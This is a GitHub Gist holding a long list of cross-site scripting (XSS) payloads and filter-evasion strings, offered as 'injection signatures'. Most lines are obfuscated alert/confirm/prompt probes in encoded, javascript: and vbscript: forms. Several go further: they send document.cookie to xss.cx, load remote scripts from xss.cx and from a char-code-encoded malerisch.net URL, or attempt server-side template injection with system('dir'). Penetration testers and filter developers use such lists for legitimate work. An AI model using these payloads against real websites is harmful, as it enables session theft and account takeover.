Created
February 1, 2015 02:03
-
-
Save xsscx/0e55b25f6b959bf572a9 to your computer and use it in GitHub Desktop.
XSS, Cross Site Scripting, Javascript Injection Signatures from XSS.Cx
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
'() {' | |
document.createElement('img').src='javascript:while(1){}' | |
'<'s'v'g' o'n'l'o'a'd'='a'l'e'r't'('7')' '>' | |
(function(a){alert(1)}).call() | |
{{toString.constructor.prototype.toString=toString.constructor.prototype.call;["a","alert(1)"].sort(toString.constructor)}} | |
p'rompt(1) | |
"(prompt(1))in" | |
parseInt("prompt",36); | |
eval((1558153217).toString(36).concat(String.fromCharCode(40)).concat(1).concat(String.fromCharCode(41))) | |
eval(1558153217..toString(36))(1) | |
eval(630038579..toString(30))(1) | |
eval(0x258da033.toString(30))(1) | |
for((i)in(self))eval(i)(1) | |
{"source":{},"__proto__":{"source":"$`onerror=prompt(1)>"}} | |
//prompt.ml%2f@ᄒ.ws/✌ | |
//prompt.ml%2f@⒕₨ | |
javascript:prompt(1)#{"action":1} | |
vbscript:prompt(1)#{"action":1} | |
window.location.assign("http://xss.cx") | |
window.name='a\x01b' | |
window.name='hacked';location.replace('about:blank'); | |
window.name="javascript:confirm((window.opener||window).document.cookie);"; | |
window.open("http://xss.cx","confirm(document.domain);", "", false); | |
vbscr	ipt:confirm(1)" | |
vbscript:confirm(1); | |
vbscript:confirm(1); | |
{{{}.toString.constructor('confirm(1)')()}} | |
try{confirm(document.domain)}catch(e){location.reload()} | |
\u003C | |
\u003E | |
\u003c | |
\u003cscript\u003econfirm(\u0027XSS\u0027)\u003c/script\u003e | |
\u003e | |
\u0061lert(1) | |
\u0061\u006c\u0065\u0072\u0074 | |
\u0061\u006c\u0065\u0072\u0074(1) | |
%ufflcxss%2f%uffle | |
this["ownerDocu"+"ment"]["loca"+"tion"]=”//google.com” | |
throw delete~typeof~confirm(1)/ | |
data:text/html;base64,PHNjcmlwdD5hbGVydCgiSGVsbG8iKTs8L3NjcmlwdD4= | |
data:text/html;base64,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg== | |
data:text/html,<script>confirm(0);confirm(1);location.reload();</script> | |
.__defineGetter__.constructor('[].constructor. | |
defineSetter('x',confirm); x=1; | |
delete [a=confirm],delete a(1) | |
delete confirm(1) | |
delete~[a=confirm]/delete a(1) | |
var a=0; ((a == 1) ? 2 : confirm(1));// | |
null%22%20style%3d%22background%3aexpression%28confirm%282727%29 | |
";document.body.addEventListener("DOMActivate",confirm(1))// | |
delete~[a=confirm]/delete a(1) | |
(0)['constructor']['constructor']("\141\154\145\162\164(1)")(); | |
javascript:confirm&lpar1&rpar | |
" onfocus="write(unescape('<')+'script src='+unescape('"http://') | |
' onmouseover=confirm(document.location) | |
(0)['constructor']['constructor']("\141\154\145\162\164(1)")(); | |
{1+1,confirm(8)} | |
<blink/ onmouseover=prompt(1)>OnMouseOver | |
({})[$='\143\157\156\163\164\162\165\143\164\157\162'][$]('\141\154\145\162\164\50/ 12345 /\51')() | |
1/confirm(1) | |
"1\"&confirm(1)\"3" | |
>%22%27><img%20src%3d%22javascript:confirm(%27%20XSS%27)%22>'%uff1cscript%uff1econfirm('XSS')%uff1c/script%uff1e'">>"'';!--"<XSS>=&{()} | |
\%22}%29%29%29}catch%28e%29{confirm%28document.domain%29;}// | |
'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Exss(0x000045)%3C/script%3E | |
\%22;confirm(1);// | |
\%22))}catch(e){}if(!self.a)self.a=!confirm(document.cookie)// | |
Event.prototype[0]='@garethheyes',Event.prototype.length=1;Event.prototype.toString=[].join;onload=confirm | |
ExternalInterface.call("document.write","<script>confirm(1)</script>"); | |
ExternalInterface.call("eval","myWindow=window.open('','','width=200,height=100'); myWindow.document.write(\"<html><head><script src=\'http://xss.cx/xss.js\'></script></head><body>hi</body></html>\");myWindow.focus()"); | |
JaVaScRipT:confirm(1) | |
String.fromCharCode(0xffff+0x3d) | |
(String.fromCharCode(97,108,101,114,116,40,39,104,105,39,41)) | |
[U+2028]confirm(1) | |
'-/"/-confirm(1)//' | |
+confirm(1) | |
+confirm(1)-- | |
-confirm(1)- | |
\";confirm(1);// | |
“;confirm(1)// | |
confirm(1)".replace(/.+/,eval)// | |
confirm(1)>>>/xss | |
'+confirm(9)&&null==' | |
';confirm(String.fromCharCode(88,83,83))//';confirm(String.fromCharCode(88,83,83))//"; | |
confirm(String.fromCharCode(88,83,83))//";confirm(String.fromCharCode(88,83,83))//-- | |
';confirm(String.fromCharCode(88,83,83))//';confirm(String.fromCharCode(88,83,83))//";confirm(String.fromCharCode(88,83,83))//";confirm(String.fromCharCode(88,83,83))//--</SCRIPT>">'><SCRIPT>confirm(String.fromCharCode(88,83,83))</SCRIPT> | |
';confirm(String.fromCharCode(88,83,83))//\';confirm(String.fromCharCode(88,83,83))//";confirm(String.fromCharCode(88,83,83))//\";confirm(String.fromCharCode(88,83,83))//--></SCRIPT>">'><SCRIPT>confirm(String.fromCharCode(88,83,83))</SCRIPT>=&{} | |
\";confirm(document.location);// | |
confirm(document.location) | |
confirm(document.selection.createRange().getBookmark()) | |
confirm(location.hostname) | |
confirm(window.toStaticHTML('<base href="http://xss.cx/"></base>')); | |
confirm(window.toStaticHTML('<label style="overflow:hidden;background:red;display:block;width:4000px;height:4000px;position:absolute;top:0px;left:0px;" for="submit">Click')); | |
confirm(window.toStaticHTML('<marquee>foo</marquee>')); | |
confirm(<xss>xs{[function::status]}s</xss>) | |
%c0″//(0000%0dconfirm(1)// | |
;\"))}catch(e) {confirm(document.location);}// | |
;\\"))}catch(e) {confirm(document.location);}// | |
\"));}catch(e){confirm(document.domain);}// | |
\"));}catch(e){confirm(document.domain)}// | |
\"));}catch(e){x=window.open('http://xss.cx/');setTimeout('confirm(x.document.body.innerText)',4000)}// | |
";document.body.addEventListener("DOMActivate",confirm(1))// | |
document.body.innerHTML=('<\000\0i\000mg src=xx:x onerror=confirm(1)>') | |
"+document.cookie+" | |
document.cookie='xss=xss;domain=.cx.' | |
document.getElementsByName("login").item(0).src = http://xss.cx/ | |
document.location="http://xss.cx/default.aspx?c=" + document.cookie | |
'},document.location=window.name+'//'+ | |
document.location=window.name+'//'+ | |
document.location=window.name%2b%27//%27%2b | |
document.write('<ı onclıck=alert(1)>asd</ı>'.toUpperCase() | |
document.write('<img src="<iframe/onload=confirm(1)>\0">') | |
";escape=eval;// | |
eval(location.hash.slice(1)) | |
eval(location.hash.slice(1))// | |
");eval(name+" | |
"+eval(name)+" | |
eval(name) | |
eval('\\u'+'0061'+'lert(1)') | |
getURL("javascript:confirm(document.location)") | |
header('Refresh: 0;url=javascript:confirm(1)'); | |
htmlStr = '<a href="'+*dataentities*+'javascript:123">test</a>'; document.getElementById('placeholder').innerHTML = htmlStr; try { if(document.getElementById('placeholder').firstChild.protocol === 'javascript:') { customLog(*dataentities*); } }catch(e){}; | |
htmlStr = '<a href="javascript'+*dataentities*+'123">test</a>'; document.getElementById('placeholder').innerHTML = htmlStr; try { if(document.getElementById('placeholder').firstChild.protocol === 'javascript:') { customLog(*dataentities*); } }catch(e){}; | |
htmlStr = '<a href="javascript'+*dataentities*+':123">test</a>'; document.getElementById('placeholder').innerHTML = htmlStr; try { if(document.getElementById('placeholder').firstChild.protocol === 'javascript:') { customLog(*dataentities*); } }catch(e){}; | |
if(1)confirm(1)}{ | |
javaSCRIPT:confirm(1) | |
javas	cript:\u0061lert(1); | |
javascript:confirm(1) | |
javascript:confirm(1) | |
"javascript:confirm(0);", | |
;javascript:confirm(0); | |
;})javascript:confirm(0); | |
javascript:confirm(0); | |
javascript:confirm(1)// | |
javascript:prompt(/XSS/.source);var x = prompt;x(0);x(/XSS/.source);x | |
"javascript:prompt(/compaXSS/.source);var x = prompt;x(0);x(/XSS/.source);x" | |
/"/_javascript:prompt(/xss/.source);var x = prompt;x(0);x(/XSS/.source);x | |
javascript:\u0061lert(1) | |
javascript:confirm(document.cookie) | |
location='vbscript:alert(1)' | |
(location.hash){eval(location.hash.slice(1))}else{confirm(document.location)}//<img src="x:x" onerror="if(location.hash){eval(location.hash.slice(1))}else{confirm(document.location)}"> | |
';location='javascript://'%2Blocation.hash;' | |
location='javascript:%5c%75%30%30%36%31%5c%75%30%30%36%63%5c %75%30%30%36%35%5c%75%30%30%37%32%5c%75%30%30%37%34(1)' | |
location='javascript:%61%6c%65%72%74%28%31%29' | |
location=javascript:confirm(0);. | |
";location=name;// | |
\nconfirm(1) | |
navigateToURL(new URLRequest("Javascript: document.write(\"<script>confirm(1)</scr\"+\"ipt>\")"),"_self") | |
new XMLHttpRequest().open("GET", "data:text/html,<svg onload=confirm(2)></svg>", false); | |
;onerror=confirm;throw 1; | |
onerror=confirm;throw 1; | |
onerror=confirm;throw 1; | |
onerror=eval;throw'=confirm\x281\x29'; | |
onerror=eval;throw'=confirm\x281\x29'; | |
"onload="a=document.createElement('script');a.setAttribute('src',String.fromCharCode(104,116,116,112,58,47,47,109,97,108,101,114,105,115,99,104,46,110,101,116,47,97,46,106,115));document.body.appendChild(a) | |
onload=confirm(1)// | |
prompt(0x0064) | |
;prompt(1)//”;prompt(2)//”;prompt(3)//–></SCRIPT>”>’><SCRIPT>prompt(4)</SCRIPT> | |
"!=prompt(9)!=" | |
"*prompt(9)*" | |
"-prompt(9)-" | |
"/prompt(9)/" | |
"<<prompt(9)<<" | |
"<=prompt(9)<=" | |
"<prompt(9)<" | |
"===prompt(9)===" | |
"==prompt(9)==" | |
">=prompt(9)>=" | |
">>>prompt(9)>>>" | |
">>prompt(9)>>" | |
">prompt(9)>" | |
"?prompt(9):" | |
"^prompt(9)^" | |
"|prompt(9)|" | |
"||prompt(9)||" | |
prompt(9) | |
prompt(location.hash) | |
prototype.join=function(){confirm("PWND:"+document.body.innerHTML)}')(); | |
j
a
vas
cript:confirm(1); | |
parseInt("confirm",30) == 8680439 && 8680439..toString(30) == "confirm" | |
prompt(1)-eval(JSON.parse(name).input) | |
javascript:HTMLDocument.__proto__.__defineSetter__("prototype",function(){try{d.d.d}catch(e){confirm(e.stack)}}) | |
confirm`1`; var something = `abc${confirm(1)}def`; ``.constructor.constructor`confirm\`1\````; | |
'"()=<z> | |
'"(){}[]; | |
JaVAscRIPT:confirm(4) | |
[XSS](javascript:confirm(6)) | |
(javascript:window.onerror=confirm;throw%20document.cookie) | |
0\%22))}catch(e){confirm(2)}// | |
Components.lookupMethod(self, 'confirm')(1) | |
Data URl | |
"; ||confirm('XSS') || " | |
'';!--"<XSS>=&{()} | |
'';!--"<XSS>=&{()} | |
5.replace(/XSS/g,confirm) | |
";a.b=c;// | |
";a[b]=c;// | |
a="get"; | |
$("button").val("<iframe src=vbscript:confirm(1)>") | |
external.NavigateAndFind('http://xss.cx',[],[]) | |
javascript	:alert(1) | |
javascript<TAB>:alert(1) | |
{{toString.constructor.prototype.toString=toString.constructor.prototype.call%3b[%22a%22,%22alert(1)%22].sort(toString.constructor)}} | |
${@print(system(“dir”))} | |
{{m=[({}).constructor.defineProperties];[[''.toString.constructor,{'constructor':{} }].reduce(m[0])];''.toString.constructor('alert(1)')()}} | |
Function.prototype.toString=Function.prototype.call;"alert(1)//".replace("//",Function) | |
top[630038579..toString(30)](1) | |
*/(URL[%26quot;\142\151\147%26quot;][%26quot;\143\157\156\163\164\162\165\143\164\157\162%26quot;](%26quot;\141\154\145\162\164\75\141\154\145\162\164\50\61\51%26quot;)())'%3E%3C%%20style='x:expression/* | |
\u{61}l\u{65}rt`1` | |
Object.prototype[Symbol.toStringTag]='<svg/onload=alert(1)>'; | |
while(1){} | |
location='javascript:1+{}' |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment